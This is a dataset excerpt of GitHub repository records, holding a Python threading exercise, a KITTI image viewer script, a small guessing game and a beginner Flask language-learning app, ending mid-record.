0.584384560585022, "alphanum_fraction": 0.5898397564888, "avg_line_length": 29.55208396911621, "blob_id": "c652ab00adac9a614b3b30e4cb926f4b8d18a2c4", "content_id": "3a835ac0b5c724b9dec57c0f55a32dec2f9e8add", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2933, "license_type": "no_license", "max_line_length": 116, "num_lines": 96, "path": "/LLADI/database/courses.py", "repo_name": "DanielSherlock/LLADI", 
"src_encoding": "UTF-8", "text": "import sqlite3\nfrom time import strftime, gmtime\nfrom LLADI.functions.users import current_user\nfrom . import lessons\n\ndb_url = 'C:\\\\Users\\\\Daniel\\\\Documents\\\\GitHub\\\\LLADI\\\\database\\\\lladi.db'\n\n\nclass Course:\n def __init__(self, ucid=None, course_name=None):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n if ucid:\n cur.execute('SELECT * FROM \"Course\" WHERE \"UCID\" LIKE ?', (ucid,))\n elif course_name:\n cur.execute('SELECT * FROM \"Course\" WHERE \"Course Name\" LIKE ?', (course_name,))\n data = cur.fetchone()\n conn.close()\n if data:\n self.exists = True\n self.ucid = data[0]\n self.course_name = data[1]\n self.owner = data[2]\n self.date = data[3]\n self.picture = data[4]\n else:\n self.exists = False\n\n\ndef new_course(course_name):\n cu = current_user()\n if not cu:\n return None\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n date = strftime(\"%Y%m%d%H%M%S\", gmtime())\n cur.execute(\"insert into Course('Course Name', 'Owner UUID', 'Creation Date') VALUES(?, ?)\",\n (course_name, current_user().uuid, date))\n conn.commit()\n conn.close()\n\n\ndef get_contributors(ucid):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n cur.execute('SELECT \"Contributor UUID\" FROM \"Course Contributor\" WHERE \"Course UCID\" LIKE ?', (ucid,))\n data = cur.fetchall()\n conn.close()\n uuids = []\n for entry in data:\n uuids.append(entry[0])\n return uuids\n\n\ndef get_lessons(ucid):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n cur.execute('SELECT \"ULID\" FROM \"Lesson\" WHERE \"Course UCID\" LIKE ?', (ucid,))\n data = cur.fetchall()\n conn.close()\n uuids = []\n for entry in data:\n uuids.append(entry[0])\n sorted_lessons = []\n for entry in uuids:\n sorted_lessons.append(lessons.Lesson(entry))\n sorted_lessons.sort(key=lambda x: x.tier)\n return sorted_lessons\n\n\ndef search_course(search):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n cur.execute('SELECT \"UCID\" FROM \"Course\" WHERE \"Course Name\" LIKE ?', (\"%\" + search + \"%\",))\n data = cur.fetchall()\n conn.close()\n ret = []\n for scourse in data:\n ret.append(Course(ucid=int(scourse[0])))\n return ret\n\n\ndef create_course(name, owner, picture):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n print(picture)\n date = strftime(\"%Y%m%d%H%M%S\", gmtime())\n cur.execute(\"insert into Course('Course Name', 'Owner UUID', 'Creation Date', 'Picture') VALUES(?, ?, ?, ?)\",\n (name, int(owner), date, picture))\n conn.commit()\n cur.execute(\n 'SELECT \"UCID\" FROM \"Course\" WHERE \"Course Name\" LIKE ? AND \"Owner UUID\" LIKE ? 
AND \"Creation Date\" LIKE ?',\n (name, int(owner), date))\n data = cur.fetchone()\n conn.close()\n return data[0]\n" }, { "alpha_fraction": 0.6850393414497375, "alphanum_fraction": 0.6850393414497375, "avg_line_length": 27.22222137451172, "blob_id": "c3ffd09c6b038b738247a16c5c6928c2f7f391dc", "content_id": "6becdc22018e005ce2f42ae872ba1763f809c603", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 254, "license_type": "no_license", "max_line_length": 51, "num_lines": 9, "path": "/LLADI/functions/follow.py", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "from LLADI.database import follows\n\ndef validate_follow(follower, followee):\n fcheck = follows.Follow(follower=follower).data\n match = False\n for followed in fcheck:\n if followee in followed:\n match = True\n return not match\n" }, { "alpha_fraction": 0.508690595626831, "alphanum_fraction": 0.5196987390518188, "avg_line_length": 32.843135833740234, "blob_id": "31b498e86b0a1760030f47bb2800d2171ae9a9e2", "content_id": "b3da3e9bef55de77e99cae75e3783ae556a76e2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1726, "license_type": "no_license", "max_line_length": 130, "num_lines": 51, "path": "/LLADI/database/lessons.py", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "import sqlite3\nfrom time import strftime, gmtime\n\ndb_url = 'C:\\\\Users\\\\Daniel\\\\Documents\\\\GitHub\\\\LLADI\\\\database\\\\lladi.db'\n\n\nclass Lesson:\n def __init__(self, ulid):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n cur.execute('SELECT * FROM \"Lesson\" WHERE \"ULID\" LIKE ?', (ulid,))\n data = cur.fetchone()\n conn.close()\n if data:\n self.exists = True\n self.ulid = data[0]\n self.name = data[1]\n self.course_ucid = data[2]\n self.tier = data[3]\n self.date = data[4]\n else:\n self.exists = False\n\n\nclass Question:\n def __init__(self, q_type, uqid):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n if q_type == \"Q_3OPT\":\n cur.execute('SELECT * FROM \"Q_3OPT\" WHERE \"UQID\" LIKE ?', (uqid,))\n data = cur.fetchone()\n if data:\n self.exists = True\n self.type = q_type\n self.uqid = data[0]\n self.word = data[1]\n self.target = data[2]\n self.picture = data[3]\n self.lesson_ulid = data[4]\n self.audio = data[5]\n cur.execute('SELECT \"Key UKID\", \"Required Knowledge\" FROM \"KeyQuestionRequire\" WHERE \"Question UQID\" LIKE ?', (uqid,))\n self.requiredKeys = {}\n for key in cur.fetchall():\n self.requiredKeys[key[0]] = key[1]\n cur.execute('SELECT \"Key UKID\" FROM \"KeyQuestionEffect\" WHERE \"Question UQID\" LIKE ?', (uqid,))\n self.effectedKeys = []\n for key in cur.fetchall():\n self.effectedKeys.append(key[0])\n else:\n self.exists = False\n conn.close()\n" } ]
14
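register.py and login.py in this record lean on passlib's `custom_app_context` for salted password hashing, so plaintext passwords never reach the database. A minimal round-trip of that pattern, runnable on its own (`encrypt()` is the older alias the repo uses; newer passlib spells it `hash()`):

```python
# Hash on registration, verify on login: the same passlib calls the
# repo wraps in register_user() and valid_login().
from passlib.apps import custom_app_context as pwd_context

stored = pwd_context.encrypt("correct horse battery staple")  # salted hash, safe to store
print(pwd_context.verify("correct horse battery staple", stored))  # True
print(pwd_context.verify("wrong password", stored))                # False
```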
RishabKattimani/FaunaDBReadCSV
https://github.com/RishabKattimani/FaunaDBReadCSV
da6c3872fe7388364a63c5b967c6711301f6d0e5
1a2fd35e510b6bd4ee461de0eddce9836af66e20
d39690bb4b1fd80c06d278cc4a2cc458d4bb3d5d
refs/heads/master
2022-12-02T12:48:00.704505
2020-07-27T16:35:36
2020-07-27T16:35:36
282,954,871
2
1
null
null
null
null
null
[ { "alpha_fraction": 0.3745519816875458, "alphanum_fraction": 0.38649940490722656, "avg_line_length": 30.823530197143555, "blob_id": "307ce5d0aa9166c89d9b664f15cc6b2e19a5cf2e", "content_id": "6725b178e35e15c13acdbe17bc115539cef7f714", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1674, "license_type": "no_license", "max_line_length": 105, "num_lines": 51, "path": "/csvread (Rishab Kattimani's conflicted copy 2020-07-24).py", "repo_name": "RishabKattimani/FaunaDBReadCSV", "src_encoding": "UTF-8", "text": "#-------------------------------------------------------------------------------\r\n# Imports\r\nfrom faunadb import query as q\r\nfrom faunadb.objects import Ref\r\nfrom faunadb.client import FaunaClient\r\nfrom csv import *\r\nfrom datetime import datetime, date\r\nimport config as config\r\n#-------------------------------------------------------------------------------\r\n# Variables & Setup\r\nclient = FaunaClient(secret=config.secret) # Connection To Fauna\r\n\r\n# ------------------------------------------------------------------------------\r\n# Reading CSV File\r\nwith open('data.csv', 'r') as read_obj:\r\n\r\n csv_reader = reader(read_obj)\r\n\r\n#-------------------------------------------------------------------------------\r\n# Getting Age\r\n for row in csv_reader:\r\n\r\n date_str = row[2]\r\n\r\n date_object = datetime.strptime(row[2], '%m/%d/%Y').date()\r\n\r\n today = date.today()\r\n\r\n age = (today.year - date_object.year)\r\n#-------------------------------------------------------------------------------\r\n# Age Groups\r\n if age >= 19 and age <= 60:\r\n AgeGroup = \"Adult\"\r\n\r\n if age >= 60 and age <= 1000:\r\n AgeGroup = \"Senior\"\r\n\r\n if age >= 9 and age <= 19:\r\n AgeGroup = \"Teen\"\r\n\r\n if age >= 0 and age <= 9:\r\n AgeGroup = \"Child\"\r\n#-------------------------------------------------------------------------------\r\n# Pushing Data To FaunaDB\r\n print (age, AgeGroup)\r\n\r\n client.query(\r\n q.create(\r\n q.collection(\"BollywoodActor\"),\r\n {\"data\": {\"Name\": row[0], \"Image\": row[1], \"DOB\": row[2], \"Age\": age, \"AgeGroup\": AgeGroup}}\r\n ))\r\n" } ]
1
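The CSV script above derives age from a date of birth, and the cleanest way to do that exactly is to subtract one year whenever the birthday has not yet occurred in the current year. A small stdlib sketch of just that calculation (the sample date is made up):

```python
# Exact age: the boolean comparison is 1 when the birthday is still ahead
# this year, which knocks the year difference down by one.
from datetime import date, datetime

def age_on(dob: date, today: date) -> int:
    return today.year - dob.year - ((today.month, today.day) < (dob.month, dob.day))

dob = datetime.strptime("12/25/1990", "%m/%d/%Y").date()
print(age_on(dob, date(2020, 7, 24)))  # 29: the December birthday hasn't happened yet
```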
hasanbal/django-rest
https://github.com/hasanbal/django-rest
864b95f7e2d141126caecacb657e443a0cc1a0b9
2d0c5a0c5ccb78960a2de50919d328d1f0c9b69f
bd75cadb74d538f948110cc523727d755199c0cc
refs/heads/master
2020-04-17T00:55:13.380891
2019-01-16T17:14:51
2019-01-16T17:14:51
166,067,805
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7759103775024414, "alphanum_fraction": 0.7787114977836609, "avg_line_length": 26.461538314819336, "blob_id": "209aa5623a95915b3b43ed8004570cc617ea01bd", "content_id": "47a2d3b1dc78e5c6505ce62f53c351194e074199", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 357, "license_type": "no_license", "max_line_length": 45, "num_lines": 13, "path": "/rest-api/rest/views.py", "repo_name": "hasanbal/django-rest", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\n\nfrom models import Driver\nfrom rest_framework import viewsets\nfrom rest.serializers import DriverSerializer\n# Create your views here.\n\nclass DriverViewSet(viewsets.ModelViewSet):\n queryset = Driver.objects.all()\n serializer_class = DriverSerializer\n" }, { "alpha_fraction": 0.7185090184211731, "alphanum_fraction": 0.7455012798309326, "avg_line_length": 21.22857093811035, "blob_id": "14c67036be52a2f1f0be38077f48e404cbadb7e3", "content_id": "322f56a39002ed25cbaa26ed3c761178e749f58d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 778, "license_type": "no_license", "max_line_length": 121, "num_lines": 35, "path": "/README.md", "repo_name": "hasanbal/django-rest", "src_encoding": "UTF-8", "text": "# django-rest\nSimple Django Rest Framework Example\n\n# How To Use\n\nFirstly, you should install **django** and **djangorestframework**\n```\npip install django\n```\n```\npip install djangorestframework\n```\n\nAfter installation download the project files and migrate. Don't forget to going project directory before migration.\n\n```\npython manage.py migrate\n```\n\nThen create a superuser for using API functions\n```\npython manage.py createsuperuser --email [email protected] --username admin\n```\n\nFinally, run server.\n```\npython manage.py runserver\n```\n\n\nYou can see the sample drivers at http://127.0.0.1:8000/drivers/\n\nAlso you can create, read, update and delete drivers. \n\nFor delete and update functions you should go to the specific drivers link, for example: http://127.0.0.1:8000/drivers/1/\n" } ]
2
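The record above includes views.py but not the project's urls.py, so the wiring behind the README's `/drivers/` endpoint has to be inferred. A conventional DRF router setup for that era of Django (an assumption sketched from the README, not code taken from the repo):

```python
# Hypothetical rest-api/urls.py: a DefaultRouter exposes DriverViewSet
# at /drivers/ with list/create/retrieve/update/delete, matching the README.
from django.conf.urls import url, include
from rest_framework import routers
from rest import views

router = routers.DefaultRouter()
router.register(r'drivers', views.DriverViewSet)

urlpatterns = [
    url(r'^', include(router.urls)),
]
```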
shabazbpatel/datmo-face-recognition
https://github.com/shabazbpatel/datmo-face-recognition
5e12feff5570c5528f0b943a971f805a314472ef
a022a2242d792cad71e915380edc4848bbbe99a1
2db12b032203d2e33cd4ca213206a045733df743
refs/heads/master
2018-05-02T18:19:43.257763
2017-10-16T23:02:53
2017-10-16T23:02:53
87,882,677
1
1
null
2017-04-11T03:08:48
2017-08-18T08:02:05
2017-08-22T18:42:03
Jupyter Notebook
[ { "alpha_fraction": 0.6821244359016418, "alphanum_fraction": 0.6884661316871643, "avg_line_length": 31.779220581054688, "blob_id": "24d6aa869e0309930e4e3c5f5484f86cdf4a917d", "content_id": "c5792a2f7db5244c042b7299ea44a95c958a97bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2523, "license_type": "no_license", "max_line_length": 92, "num_lines": 77, "path": "/recognition.py", "repo_name": "shabazbpatel/datmo-face-recognition", "src_encoding": "UTF-8", "text": "import face_recognition\nimport os\nimport pandas as pd\nimport numpy as np\nimport json\nimport pickle\nfrom glob import glob\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import precision_recall_fscore_support\nnp.random.seed(5)\n\ndata = []\ntarget = []\nface_names = []\nnum_faces = len(face_names)\n# Training load data\nfaces_selected = set()\n\nwith open(os.environ['INPUT_DIR']+'/config.json') as f:\n config = json.load(f)\n\nclass_names = config['class_names']\nn_jobs = int(config['n_jobs'])\nsplit_prob = config['split_prob']\n\nfor file_path in glob(os.environ.get(\"DATA_DIR\")+\"/*/*\"):\n class_name = file_path.split('/')[-2]\n if class_name in class_names and class_name != 'test':\n if class_name not in faces_selected:\n faces_selected.add(class_name)\n face_names.append(class_name)\n load_image = face_recognition.load_image_file(file_path)\n list_encoding = face_recognition.face_encodings(load_image)\n if len(list_encoding) > 0:\n face_encoding = list_encoding[0]\n data.append(face_encoding)\n target.append(face_names.index(class_name))\n\nface_names = np.array(face_names)\ndata = np.asarray(data)\ndimensions = range(len(face_encoding))\nfilename = os.path.join(os.environ['OUTPUT_DIR'],'face_names.pkl')\npickle.dump(face_names, open(filename, 'wb'))\n\n\ndf = pd.DataFrame(data, columns=dimensions)\ndf['is_train'] = np.random.uniform(0, 1, len(df)) <= split_prob\ndf['face'] = pd.Categorical.from_codes(target, face_names)\ndf.head()\n\ntrain, test = df[df['is_train']==True], df[df['is_train']==False]\n\nfeatures = df.columns[:len(face_encoding)]\nclf = RandomForestClassifier(n_jobs=n_jobs)\ny, _ = pd.factorize(train['face'])\nclf.fit(train[features], y)\npreds = face_names[np.array(clf.predict(test[features]))]\ncross_validation = pd.crosstab(test['face'], preds, rownames=['actual'], colnames=['preds'])\ny_true = np.array(list(test['face']))\ny_pred = np.array(preds)\n\np_r_f1 = precision_recall_fscore_support(y_true, y_pred, average='macro')\nprecision = p_r_f1[0]\nrecall = p_r_f1[1]\nf1_score = p_r_f1[2]\nstats = {'label': 'random_forest'}\nstats['precision'] = precision\nstats['recall'] = recall\nstats['f1_score'] = f1_score\nprint stats\n\nmodel_filename = os.path.join(os.environ['OUTPUT_DIR'],'model.dat')\npickle.dump(clf, open(model_filename, 'wb'))\nstats_filename = os.path.join(os.environ['OUTPUT_DIR'],'stats.json')\nwith open(stats_filename, 'wb') as f:\n f.write(json.dumps(stats))" }, { "alpha_fraction": 0.7632508873939514, "alphanum_fraction": 0.768551230430603, "avg_line_length": 39.5, "blob_id": "19e6f15ce54420aa195d2a9a951e087f3ad6aee6", "content_id": "4288e3a697cf1e0ef695e8a123c15a6fa7360f9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 566, "license_type": "no_license", "max_line_length": 86, "num_lines": 14, "path": "/verification.py", "repo_name": "shabazbpatel/datmo-face-recognition", "src_encoding": "UTF-8", "text": 
"import face_recognition\nimport os\n\ndonald_image_path = os.path.join(os.environ.get(\"DATA_DIR\"), 'putin', '4.jpg')\nunknown_image_path = os.path.join(os.environ.get(\"DATA_DIR\"), 'test', 'putin_snl.jpg')\nknown_image = face_recognition.load_image_file(donald_image_path)\nunknown_image = face_recognition.load_image_file(unknown_image_path)\n\ndonald_encoding = face_recognition.face_encodings(known_image)[0]\nunknown_encoding = face_recognition.face_encodings(unknown_image)[0]\n\nresults = face_recognition.compare_faces([donald_encoding], unknown_encoding)\n\nprint(results)" }, { "alpha_fraction": 0.76953125, "alphanum_fraction": 0.76953125, "avg_line_length": 31.125, "blob_id": "0f7b9c9acb78d943d8c372798bf1018908c80fea", "content_id": "26c36cac19fe36b4811c5c41523ff63748cf2246", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 256, "license_type": "no_license", "max_line_length": 79, "num_lines": 8, "path": "/landmark_detection.py", "repo_name": "shabazbpatel/datmo-face-recognition", "src_encoding": "UTF-8", "text": "import os\nimport face_recognition\n\nimage_path = os.path.join(os.environ.get(\"DATA_DIR\"), 'test', 'test_image.jpg')\n\nimage = face_recognition.load_image_file(image_path)\nface_landmarks_list = face_recognition.face_landmarks(image)\nprint(face_landmarks_list)" }, { "alpha_fraction": 0.7799227833747864, "alphanum_fraction": 0.7799227833747864, "avg_line_length": 42.16666793823242, "blob_id": "9ab3566fc757f4f9254d8922005348e247ffd105", "content_id": "57f69154d254ced1f89179f1a79ee360182b7fe3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 259, "license_type": "no_license", "max_line_length": 120, "num_lines": 6, "path": "/_datmo/README_template.md", "repo_name": "shabazbpatel/datmo-face-recognition", "src_encoding": "UTF-8", "text": "# [model name] Face Recognition \n\n[model badge]\n[![Datmo Model](http://beta.datmo.io/shabazp/face-recognition/badge.svg)](http://beta.datmo.io/shabazp/face-recognition)\n\n[model description] This repository comprises main tasks required for facial recognition\n" }, { "alpha_fraction": 0.7721205949783325, "alphanum_fraction": 0.7775580883026123, "avg_line_length": 73.9259262084961, "blob_id": "92fbb11572e97f204f12b752ea7322fe08b80de3", "content_id": "85887c17f3b17bd31d8d7743376c31b9be40938b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2023, "license_type": "no_license", "max_line_length": 218, "num_lines": 27, "path": "/README.md", "repo_name": "shabazbpatel/datmo-face-recognition", "src_encoding": "UTF-8", "text": "# Face Recognition\n\n[![Datmo Model](https://datmo.io/shabazp/datmo-face-recognition/badge.svg)](https://datmo.io/shabazp/datmo-face-recognition)\n\nComputer vision model for facial recognition. This repository comprises main tasks required to be done using facial recognition. For training run, `datmo task run \"python recognition.py\"`\n\n### 1. Face Detection ([detection](https://github.com/Acusense/face-recognition/blob/master/src/detection.py))\n* To find bounding box for faces.\n* To find number of people in any image.\n* Usage: Application can range like Facebook using this to find count of people and detect face to let users tag it.\n\n### 2. 
Facial Landmark Detection ([landmark_detection](https://github.com/Acusense/face-recognition/blob/master/src/landmark_detection.py))\n\n* To find the face feature locations (eyes, nose, etc) for each face in the image\n* Usage: Application can lie to apply makeup application or is the founding basis to overlay structure as Snapchat does for [lenses](https://support.snapchat.com/en-US/article/lenses1)\n\n### 3. Facial Verification ([verification](https://github.com/Acusense/face-recognition/blob/master/src/verification.py))\n* Given an image of face, we can compare if any new image contains the same person.\n* Usage: Widely used application eg. Uber uses to check if driver is the same person as registered on [app](https://newsroom.uber.com/securityselfies/)\n\n### 4. Facial Recognition ([recognition](https://github.com/Acusense/face-recognition/blob/master/src/recognition.py)/[training](https://github.com/Acusense/face-recognition/blob/master/src/recognition_training.ipynb))\n\n* In a given number of classes does any new image of a face lie in one of the classes.\n* Usage: Application lie to identify any celebrety and also used by Facebook to identify friends in moments or by Google in their Photos app.\n\n\n Built using [dlib](http://blog.dlib.net/2017/02/high-quality-face-recognition-with-deep.html) and [face_recognition](https://github.com/ageitgey/face_recognition)\n" }, { "alpha_fraction": 0.7682926654815674, "alphanum_fraction": 0.7682926654815674, "avg_line_length": 29.875, "blob_id": "996df308b656e78e844c70f5ad68aaed589322a0", "content_id": "be8b4311ca69789da9d24e2431284feccf49dbf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 246, "license_type": "no_license", "max_line_length": 79, "num_lines": 8, "path": "/detection.py", "repo_name": "shabazbpatel/datmo-face-recognition", "src_encoding": "UTF-8", "text": "import os\nimport face_recognition\n\nimage_path = os.path.join(os.environ.get(\"DATA_DIR\"), 'test', 'test_image.jpg')\n\nimage = face_recognition.load_image_file(image_path)\nface_locations = face_recognition.face_locations(image)\nprint(face_locations)" }, { "alpha_fraction": 0.615138590335846, "alphanum_fraction": 0.6178038120269775, "avg_line_length": 30.81355857849121, "blob_id": "f9d4e6cfb3755d616f4417d4cb12fe0491d194d5", "content_id": "8bfcb6ca2c69a51917ce2bbdf751ccb14dcf989d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1876, "license_type": "no_license", "max_line_length": 82, "num_lines": 59, "path": "/python_api.py", "repo_name": "shabazbpatel/datmo-face-recognition", "src_encoding": "UTF-8", "text": "import urllib, cStringIO\nimport scipy \nimport pickle\nimport os\nimport numpy as np\nimport json\nimport face_recognition\nfrom flask import Flask, request, jsonify\n\n\nfilename = os.path.join(os.environ['SNAPSHOT_DIR'],'model.dat')\nclf = pickle.load( open(filename , \"rb\" ) )\nfilename = os.path.join(os.environ['SNAPSHOT_DIR'],'face_names.pkl')\nface_names = np.array(pickle.load(open(filename, 'rb')))\n\ndef add(params):\n return params['a'] + params['b']\n\n\ndef recognition(params):\n \"\"\"\n Loads an image url (.jpg, .png, etc) into a numpy array\n :param url: image url to load\n :return: face recognition over image url\n \"\"\"\n image_file = cStringIO.StringIO(urllib.urlopen(params['url']).read())\n image = scipy.misc.imread(image_file, mode='RGB')\n # read the image file in a numpy array\n list_encoding = 
face_recognition.face_encodings(image)\n    test_pred = []\n    test_preds = []\n    if list_encoding:\n        for encoding in list_encoding:\n            test_pred = face_names[clf.predict([encoding])][0]\n            test_preds.append(test_pred)\n    return list(test_preds)\n\nfunctions_list = [add, recognition]\n\napp = Flask(__name__)\n\n@app.route('/<func_name>', methods=['POST'])\ndef api_root(func_name):\n    for function in functions_list:\n        if function.__name__ == func_name:\n            try:\n                json_req_data = request.get_json()\n                if json_req_data:\n                    res = function(json_req_data)\n                else:\n                    return jsonify({\"error\": \"error in receiving the json input\"})\n            except Exception as e:\n                return jsonify({\"error\": \"error while running the function\"})\n            return jsonify({\"result\": res})\n    output_string = 'function: %s not found' % func_name\n    return jsonify({\"error\": output_string})\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0')" } ]
7
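verification.py in this record calls `compare_faces` with its default tolerance. Under the hood that is just a thresholded Euclidean distance between 128-dimensional encodings, and `face_distance` exposes the raw score so the threshold can be tuned; a short sketch (the image paths are placeholders):

```python
# compare_faces is equivalent to face_distance <= tolerance; 0.6 is the
# library default. Lower it for stricter matching, raise it to be lenient.
import face_recognition

known = face_recognition.load_image_file("known.jpg")
unknown = face_recognition.load_image_file("unknown.jpg")

known_enc = face_recognition.face_encodings(known)[0]
unknown_enc = face_recognition.face_encodings(unknown)[0]

dist = face_recognition.face_distance([known_enc], unknown_enc)[0]
print(dist, dist <= 0.6)
```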
CrabityGames/winagent
https://github.com/CrabityGames/winagent
4f62ed2a6cbd965729a6bbd6bdb7c287fc29b7d9
14c1bf658b8eaafb160e5c0d4094b2cd580739f3
228b102a3d27e943453fde1593a26fc10d743c5d
refs/heads/master
2022-12-26T22:07:42.637832
2020-10-12T21:01:16
2020-10-12T21:01:16
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7084615230560303, "alphanum_fraction": 0.7423076629638672, "avg_line_length": 46.14814758300781, "blob_id": "e85bafbdf5fef9b9f01bc040481caa6b7a728cea", "content_id": "998af6ab986899a6dd470f92e8dacf5c5d9613f7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1300, "license_type": "permissive", "max_line_length": 199, "num_lines": 27, "path": "/README.md", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "## THIS HAS BEEN REPLACED BY THE NEW CROSS-PLATFORM [GOLANG AGENT](https://github.com/wh1te909/rmmagent)\r\n\r\n### Tactical RMM Windows Agent\r\n\r\n[![Build Status](https://travis-ci.com/wh1te909/winagent.svg?branch=master)](https://travis-ci.com/wh1te909/winagent)\r\n[![Build Status](https://dev.azure.com/dcparsi/winagent/_apis/build/status/wh1te909.winagent?branchName=master)](https://dev.azure.com/dcparsi/winagent/_build/latest?definitionId=3&branchName=master)\r\n[![License: MIT](https://img.shields.io/badge/License-MIT-blue.svg)](https://opensource.org/licenses/MIT)\r\n[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/python/black)\r\n\r\n#### Building (powershell, python 3.8.5)\r\n\r\nDownload and install [Inno Setup](http://jrsoftware.org/isinfo.php)\r\n\r\n```commandline\r\nmkdir 'C:\\Users\\Public\\Documents\\tacticalagent'\r\ncd 'C:\\Users\\Public\\Documents\\tacticalagent'\r\ngit clone https://github.com/wh1te909/winagent.git .\r\npython -m venv env\r\n.\\env\\Scripts\\Activate.ps1\r\npython -m pip install --upgrade pip\r\npip install --upgrade setuptools==49.6.0 wheel==0.35.1\r\npip install --no-cache-dir -r requirements.txt\r\npython .\\env\\Scripts\\pywin32_postinstall.py -install\r\n.\\build.ps1\r\n```\r\n\r\nExe will be in ```C:\\Users\\Public\\Documents\\tacticalagent\\Output```\r\n" }, { "alpha_fraction": 0.4917491674423218, "alphanum_fraction": 0.7161716222763062, "avg_line_length": 16.823530197143555, "blob_id": "71e19cb919c02f93e2c71e3ba535b62beb86f593", "content_id": "08397c3beeeafed8f69cf59dc0dbb27dbb1d864c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 303, "license_type": "permissive", "max_line_length": 52, "num_lines": 17, "path": "/requirements.txt", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "altgraph==0.17\ncertifi==2020.6.20\nchardet==3.0.4\ndecorator==4.4.2\nfuture==0.18.2\nidna==2.10\npeewee==3.13.3\npefile==2019.4.18\npsutil==5.7.2\ngit+git://github.com/pyinstaller/pyinstaller@develop\npywin32==228\npywin32-ctypes==0.2.0\nrequests==2.24.0\nsix==1.15.0\nurllib3==1.25.10\nvalidators==0.18.1\nWMI==1.5.1\n" }, { "alpha_fraction": 0.4142143130302429, "alphanum_fraction": 0.41754579544067383, "avg_line_length": 32.97087478637695, "blob_id": "5c93b411ed23551524b898a99eb81dc4765b0df3", "content_id": "10efc1718f9d54c6796e3b72ec3fa022df3faae4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3602, "license_type": "permissive", "max_line_length": 105, "num_lines": 103, "path": "/winagent/winupdater.py", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "import json\r\nimport subprocess\r\n\r\nimport requests\r\n\r\nfrom agent import WindowsAgent\r\n\r\n\r\nclass WinUpdater(WindowsAgent):\r\n def __init__(self, log_level, log_to):\r\n super().__init__(log_level, log_to)\r\n self.updater_url = 
f\"{self.astor.server}/winupdate/winupdater/\"\r\n self.results_url = f\"{self.astor.server}/winupdate/results/\"\r\n self.scan_url = f\"{self.astor.server}/api/v1/triggerpatchscan/\"\r\n self.check_payload = {\"agent_id\": self.astor.agentid}\r\n\r\n def install_update(self, kb):\r\n try:\r\n r = subprocess.run(\r\n [\r\n self.salt_call,\r\n \"win_wua.get\",\r\n f\"{kb}\",\r\n \"download=True\",\r\n \"install=True\",\r\n \"--local\",\r\n ],\r\n capture_output=True,\r\n timeout=7200,\r\n )\r\n ret = r.stdout.decode(\"utf-8\", errors=\"ignore\")\r\n self.logger.debug(ret)\r\n return ret\r\n except Exception as e:\r\n self.logger.debug(e)\r\n\r\n def trigger_patch_scan(self):\r\n try:\r\n payload = {\r\n \"agent_id\": self.astor.agentid,\r\n \"reboot\": self.salt_call_ret_bool(\"win_wua.get_needs_reboot\"),\r\n }\r\n r = requests.patch(\r\n self.scan_url,\r\n data=json.dumps(payload),\r\n headers=self.headers,\r\n timeout=60,\r\n verify=self.verify,\r\n )\r\n except Exception as e:\r\n self.logger.debug(e)\r\n return False\r\n\r\n return \"ok\"\r\n\r\n def install_all(self):\r\n try:\r\n resp = requests.get(\r\n self.updater_url,\r\n data=json.dumps(self.check_payload),\r\n headers=self.headers,\r\n timeout=30,\r\n verify=self.verify,\r\n )\r\n except Exception as e:\r\n self.logger.debug(e)\r\n return False\r\n else:\r\n if resp.json() == \"nopatches\":\r\n return False\r\n else:\r\n try:\r\n for patch in resp.json():\r\n kb = patch[\"kb\"]\r\n install = self.install_update(kb)\r\n self.logger.info(install)\r\n res_payload = {\"agent_id\": self.astor.agentid, \"kb\": kb}\r\n status = json.loads(install)\r\n\r\n if (\r\n status[\"local\"][\"Install\"][\"Updates\"]\r\n == \"Nothing to install\"\r\n ):\r\n res_payload.update({\"results\": \"alreadyinstalled\"})\r\n else:\r\n if status[\"local\"][\"Install\"][\"Success\"]:\r\n res_payload.update({\"results\": \"success\"})\r\n else:\r\n res_payload.update({\"results\": \"failed\"})\r\n\r\n requests.patch(\r\n self.results_url,\r\n json.dumps(res_payload),\r\n headers=self.headers,\r\n timeout=30,\r\n verify=self.verify,\r\n )\r\n\r\n # trigger a patch scan once all updates 